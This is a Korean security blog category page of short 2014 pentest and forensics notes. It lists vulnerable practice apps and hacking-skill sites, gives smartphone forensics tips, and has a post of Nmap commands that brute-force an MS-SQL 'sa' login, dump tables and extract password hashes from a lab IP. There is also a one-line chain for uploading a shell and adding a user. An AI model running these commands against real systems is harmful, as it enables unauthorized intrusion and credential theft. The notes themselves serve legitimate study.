'보안' 카테고리의 글 목록 (3 Page)

Vulnerable Web Applications [43 unique web applications]
OWASP BWA	http://code.google.com/p/owaspbwa/
OWASP Hackademic	http://hackademic1.teilar.gr/
Butterfly Security Project	http://thebutterflytmp.sourceforge.net/
Foundstone Hackme Bank	http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Foundstone Hackme Books	http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Foundstone Hackme Casino	http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Foundstone Hackme Shipping	http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Foundstone Hackme Travel	http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
LAMPSecurity	http://sourceforge.net/projects/lampsecurity/
Moth	http://www.bonsai-sec.com/en/research/moth.php
WackoPicko	https://github.com/adamdoupe/WackoPicko
BadStore	http://www.badstore.net/
WebSecurity Dojo	http://www.mavensecurity.com/web_security_dojo/
BodgeIt Store	http://code.google.com/p/bodgeit/
hackxor	http://hackxor.sourceforge.net/cgi-bin/index.pl
SecuriBench	http://suif.stanford.edu/~livshits/securibench/
SQLol	https://github.com/SpiderLabs/SQLol
CryptOMG	https://github.com/SpiderLabs/CryptOMG
XMLmao	https://github.com/SpiderLabs/XMLmao
Exploit KB Vulnerable Web App	http://exploit.co.il/projects/vuln-web-app/
PHDays iBank CTF	http://blog.phdays.com/2012/05/once-again-about-remote-banking.html
GameOver	http://sourceforge.net/projects/null-gameover/
Zap WAVE	http://code.google.com/p/zaproxy/downloads/detail?name=zap-wave-0.1.zip
PuzzleMall	http://code.google.com/p/puzzlemall/
Vulnerable Operating System Installations [19+ unique OS setups]
Damn Vulnerable Linux	http://sourceforge.net/projects/virtualhacking/files/os/dvl/
Metasploitable v1	http://www.metasploit.com/learn-more/how-do-i-use-it/test-lab.jsp
Metasploitable v2	https://community.rapid7.com/docs/DOC-1875
LAMPSecurity	http://sourceforge.net/projects/lampsecurity/
UltimateLAMP	http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip
De-ICE, hackerdemia, pWnOS	http://forums.heorot.net/
Holynix	http://pynstrom.net/holynix.php
Kioptrix	http://www.kioptrix.com/
exploit-exercises - nebula, protostar, fusion	http://exploit-exercises.com/
CentOS	http://www.centos.org/
Sites for Downloading Older Versions of Various Software [3 sources]
Old Apps	http://www.oldapps.com/
Old Version	http://www.oldversion.com/
Exploit-DB	http://www.exploit-db.com/
Sites by Vendors of Security Testing Software [8 unique sites]
Acunetix acuforum	http://testasp.vulnweb.com/
Acunetix acublog	http://testaspnet.vulnweb.com/
Acunetix acuart	http://testphp.vulnweb.com/
Cenzic crackmebank	http://crackme.cenzic.com
HP freebank	http://zero.webappsecurity.com
IBM altoromutual	http://demo.testfire.net/
Mavituna testsparker	http://aspnet.testsparker.com
Mavituna testsparker	http://php.testsparker.com
Sites for Improving Your Hacking Skills [16 unique sites]
Google Gruyere	http://google-gruyere.appspot.com/
Hack This Site	http://www.hackthissite.org/
Hacker Challenge	http://www.dareyourmind.net/
HackQuest	http://www.hackquest.com/
Hax.Tor	http://hax.tor.hu/
Hacker Test	http://www.hackertest.net/
OverTheWire	http://www.overthewire.org/wargames/
Root Me	http://www.root-me.org/?lang=en
Smash The Stack	http://www.smashthestack.org/
TheBlackSheep and Erik	http://www.bright-shadows.net/
ThisIsLegal	http://thisislegal.com/
Try2Hack	http://www.try2hack.nl/
EnigmaGroup	http://www.enigmagroup.org/
hACME Game	http://www.hacmegame.org/

Exploit Exercises	http://exploit-exercises.com/

Hacking-Lab	https://www.hacking-lab.com

저작자표시 비영리 변경금지

'보안 > 기술 정보' 카테고리의 다른 글

[대회/세미나] 갈만한 곳 메모 (0)	2015.07.29
[Backtrack] Maintaining - nc, payload, bind_tcp (0)	2014.12.03
[AWS] re:Invent (0)	2014.11.18
[Pentest] Penetration Testing in the Real World (0)	2014.11.07
[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth (0)	2014.11.07

:

[AWS] re:Invent

보안/기술 정보 | 2014. 11. 18. 13:47 | Posted by youGom

* 전체적인 발표 및 동영상 내용

- https://reinvent.awsevents.com/

* 신규 보안 기술 발표

- http://aws.amazon.com/ko/new/reinvent/

* Lamda 관련 기사

- http://www.bloter.net/archives/212898

저작자표시 비영리 변경금지

'보안 > 기술 정보' 카테고리의 다른 글

[Backtrack] Maintaining - nc, payload, bind_tcp (0)	2014.12.03
[모의해킹] 연습할 곳 메모 (0)	2014.11.21
[Pentest] Penetration Testing in the Real World (0)	2014.11.07
[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth (0)	2014.11.07
[Pentest] Basic, Offensive Security Part 1 (0)	2014.11.07

:

[Forensics] Recovery, 파일 복구 ( 스마트폰 )

보안/Forensics | 2014. 11. 18. 11:03 | Posted by youGom

* 하기 명령어로 하려고 했으나 물리적인 인식이 잘 안됨 ( 윈도우에서도 마찬가지 )

* 아래 사이트에서 복구 프로그램 다운로드

- recovering-deleted-files.net/android-data-recovery

* 안드로이드 폰에 설치해서 파일 복구하는 App : Diskdigger

- http://androidcritics.com/how-to-recover-deleted-photos-videos-files-using-diskdigger/

* 이걸 한번 활용해 보면 어떨가.. ( 내일 해보는걸로.. )

- https://santoku-linux.com/howto/mobile-forensics/how-to-brute-force-android-encryption

* dcfldd 활용하기

* busybox 활용 하기 ( 루팅 필요 )

: download( busybox-armv4tl : android) => http://www.busybox.net/downloads/binaries/

저작자표시 비영리 변경금지

'보안 > Forensics' 카테고리의 다른 글

[Forensics] Smartphone Forensics (0)	2014.11.17

:

[Forensics] Smartphone Forensics

보안/Forensics | 2014. 11. 17. 15:21 | Posted by youGom

* PDF file download.

http://smarterforensics.com/wp-content/uploads/2014/06/Sushi-Smartphone-Forensics_Updated_20141025.pdf

* iOS 포렌직할만한 도구

- zdziarski :: https://viaforensics.com/resources/white-papers/iphone-forensics/zdziarski/

-- 여기 사이트에서 가입하고 다운로드 받으라고 하는데, 현재 접속이 안되고 있음.

=> http://www.iphoneinsecurity.com/

* Santoku linux 다운로드 받아서 경험해보기 ( only 64bit, VM-Ware에서 해보길 추천 )

=> https://santoku-linux.com/download

- Via ExtractCE

- Via ExtractCE Locked Devices

- Andriiler

- Android Memory Capture

- Android Analysis

- Autopsy ( Android Analyzer )

- Geo-Location Support ( Ex., EXIF, google Map, Browser, Cache and so on )

- Examining Media files

- Recovery SQLite Data Deleted.

* 중요 포인트

- 여기 있는 Commercial 버젼들은 모든 기종을 지원하는 것은 아니고,

- 3rd App의 경우 파싱이 완벽하지 않으며,

- 데이터를 놓치는 것들도 있음.

* 자세한 건 pdf파일 참고~ ( 영문임 ㅋㅋ )

그럼.. 이제 산토쿠 써보러 ^^;;

저작자표시 비영리 변경금지

'보안 > Forensics' 카테고리의 다른 글

[Forensics] Recovery, 파일 복구 ( 스마트폰 ) (0)	2014.11.18

:

[NMAP] MS-SQL pentest

보안/도구 | 2014. 11. 17. 14:05 | Posted by youGom

* nmap -Pn 192.168.1.3

-> 1433 port, SQL 살아 있는 것을 확인

* nmap -p1433 --script ms-sql-info 192.168.1.3

-> SQL 정보 확인

* nmap -p1433 --script ms-sql-brute 192.168.1.3

-> 기본적인 내용으로 id/pw 공격

* nmap -p1433 --script ms-sql-brute --script-args userdb=/root/Destop/user.txt,passdb=/usr/share/wordlist/fasttrack.txt 192.168.1.3

-> custom id/pw 입력해서 공격

* nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,password=a12345 192.168.1.3

-> 찾아낸 ID/PW로 테이블 내용 가져오기

* nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,password=a12345 192.168.1.3

-> 찾아낸 ID/PW로 Database password 해쉬값 가져오기

저작자표시 비영리 변경금지

'보안 > 도구' 카테고리의 다른 글

[도구] ADB 명령어 정리 내용 ( am/pm/capture/mongkey 등 ) (0)	2018.03.19
공유 게시판 이더패드 (0)	2015.03.30
[Security] Fillder Menual / UseCase (0)	2014.02.27
unix util commands (0)	2013.12.10
putty connection manager (0)	2013.10.07

:

[Pentest] Penetration Testing in the Real World

보안/기술 정보 | 2014. 11. 7. 16:10 | Posted by youGom

FTP - put rs - connect db - add user - remotedesk.

저작자표시 비영리 변경금지

'보안 > 기술 정보' 카테고리의 다른 글

[모의해킹] 연습할 곳 메모 (0)	2014.11.21
[AWS] re:Invent (0)	2014.11.18
[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth (0)	2014.11.07
[Pentest] Basic, Offensive Security Part 1 (0)	2014.11.07
Black Hat USA 2014 강연 동영상 (0)	2014.10.01

:

[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth

보안/기술 정보 | 2014. 11. 7. 16:07 | Posted by youGom

저작자표시 비영리 변경금지

'보안 > 기술 정보' 카테고리의 다른 글

[AWS] re:Invent (0)	2014.11.18
[Pentest] Penetration Testing in the Real World (0)	2014.11.07
[Pentest] Basic, Offensive Security Part 1 (0)	2014.11.07
Black Hat USA 2014 강연 동영상 (0)	2014.10.01
[Study] Forensics EnCE PLAN. (0)	2014.03.04

:

[Pentest] Basic, Offensive Security Part 1

보안/기술 정보 | 2014. 11. 7. 16:04 | Posted by youGom

Basics of Penetration Testing by KernelMeltdown.org

저작자표시 비영리 변경금지

'보안 > 기술 정보' 카테고리의 다른 글

[Pentest] Penetration Testing in the Real World (0)	2014.11.07
[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth (0)	2014.11.07
Black Hat USA 2014 강연 동영상 (0)	2014.10.01
[Study] Forensics EnCE PLAN. (0)	2014.03.04
[Security] CVE 보안 취약점 오픈소스 사이트 (0)	2014.02.28

:

Black Hat USA 2014 강연 동영상

보안/기술 정보 | 2014. 10. 1. 10:36 | Posted by youGom

https://www.youtube.com/playlist?list=UUbbgnifxfH-nqx6z9XQ963Q&app=desktop

저작자표시 비영리 변경금지

'보안 > 기술 정보' 카테고리의 다른 글

[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth (0)	2014.11.07
[Pentest] Basic, Offensive Security Part 1 (0)	2014.11.07
[Study] Forensics EnCE PLAN. (0)	2014.03.04
[Security] CVE 보안 취약점 오픈소스 사이트 (0)	2014.02.28
Php Secure Coding 정보 (0)	2013.12.03

:

the Desirable Garfield

Tags»

Archive»

Category»

Recent Comment»

Recent Post»

Recent Trackback»

My Link»

'보안'에 해당되는 글 91건

[WebHacking] 웹해킹 도구 또는 활용가능한 사이트

[모의해킹] 연습할 곳 메모

'보안 > 기술 정보' 카테고리의 다른 글

[AWS] re:Invent

'보안 > 기술 정보' 카테고리의 다른 글

[Forensics] Recovery, 파일 복구 ( 스마트폰 )

'보안 > Forensics' 카테고리의 다른 글

[Forensics] Smartphone Forensics

'보안 > Forensics' 카테고리의 다른 글

[NMAP] MS-SQL pentest

'보안 > 도구' 카테고리의 다른 글

[Pentest] Penetration Testing in the Real World

'보안 > 기술 정보' 카테고리의 다른 글

[Pentest] ZAP, Kali OWASP ZAP Tutorial, Ajax Spidering auth

'보안 > 기술 정보' 카테고리의 다른 글

[Pentest] Basic, Offensive Security Part 1

'보안 > 기술 정보' 카테고리의 다른 글

Black Hat USA 2014 강연 동영상

'보안 > 기술 정보' 카테고리의 다른 글

티스토리툴바